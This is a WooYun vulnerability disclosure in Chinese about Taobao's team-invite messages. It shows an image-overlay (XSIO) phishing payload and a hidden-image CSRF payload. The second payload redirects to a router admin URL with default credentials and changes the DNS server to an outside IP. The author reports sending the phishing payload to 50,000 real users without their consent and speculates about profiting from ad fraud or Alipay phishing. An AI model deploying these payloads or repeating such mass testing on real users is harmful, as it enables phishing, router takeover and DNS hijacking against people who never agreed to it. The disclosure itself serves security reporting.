WooYun.org

1、第一种鸡肋利用方式XSIO攻击
原本以为只是发现了鸡肋的xsio漏洞，不甘平凡测试一天想起我们还可以实现DNS劫持攻击将漏洞危害实现最大化。这些得从周五说起~
又到周五晚刷分的时候啦！这个时候通过淘宝网站导航点进了淘宝小分队http://yiqi.taobao.com/，苦寻半天没有任何收获，这时候随意一瞥邀请加入引起了我的注意。

通过抓包发现邀请内容content参数为我们可控，心理小小的鸡动了一把，知道肯定有戏！

将content内容解码发现还支持<、>、/等字符又暗自窃喜了一把

经过一番疯狂的测试发现对html事件、javascript敏感关键词全部都进行了严格过滤。但是，，，细心的白帽子还是发现了没有限制图片属性position为absolute，导致可以控制一张图片出现在网页的任意位置。那么我们就可以用这张图片去覆盖网页上的任意一个位置，包括网站的banner，包括一个link、一个button。这就可以导致页面破坏。而给图片设置一个链接后，很显然就可以起到一个钓鱼的作用，最终鸡肋的XSIO漏洞就实现了。利用代码如下

a href="http://bingsec.com?spm=0.0.0.0.LyuuFi" target="_blank" data-spm-anchor-id="0.0.0.0"><img src="http://img01.taobaocdn.com/poster_pic/T1qMpCFrRXXXXXXXXX" style="position: absolute;left:-110px;top:1px;" width="240" height="240"></a>

这时候我们登录上淘宝http://www.taobao.com，成功的将发送者和其它内容遮挡。用户竟然发现淘宝几百年难得一遇的搞起了大抽奖还是肯定中奖这时候就进入了我们的钓鱼网站圈套啦~

那如何说明xsio的危害范围呢？我们不要忘记了receiverIds参数，他是用户的唯一标识参数也就是说这个消息给哪个用户发送。可以看出参数内容为纯数字有规律，那说明是可实现自动化发送了。那我们就证明下我们的推断，也判断下这个发送接口是否对发送次数等做了限制。

这时候我向了5万用户发送了该测试内容，测试只是诱导点击指向我的blog。可以看出该接口，并没有对发送次数、时间、是否为好友等做验证，这也是导致大规模的关键因素。下面为24个小时的数据统计

上图可以看出5万用户收到该内容，却只有100个用户受到影响。但XSIO是诱导用户点击才会受到诱骗。依靠淘宝强大用户注册量大胆推断下XSIO漏洞每天会有多少用户点击，我们以5亿用户为基础，5万用户有100个受到攻击，可以推算出每天会有至少100万用户受到该漏洞攻击。5万用户xsio攻击7日上线情况

虽然影响范围是有了，但是XSIO还是过于鸡肋。有没有办法突破被动为主动攻击呢？下文就有了，
2、加强攻击方式DNS劫持
新的攻击方法DNS劫持，DNS攻击的构造方法就不多做介绍了，看下面的攻击代码吧
<div style="display:none;"><img src="http://www.v5yw.net/bg.jpg" width=0 height=0></div>
上面src源进行了302跳转。最终会跳到
http://admin:admin@192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=&dnsserver=54.248.102.5&dnsserver2=8.8.8.8&Save=%25B1%25A3+%25B4%25E6
秀一张成功DNS劫持攻击被360拦截的截图，当用户浏览互动提醒就直接触发DNS劫持攻击。如果将5亿用户全部推送DNS劫持攻击，看来DNS服务器得很牛逼才行啊。这下体现出危害了，不管是吃广告费还是做支付宝钓鱼应该都很赚钱吧。。。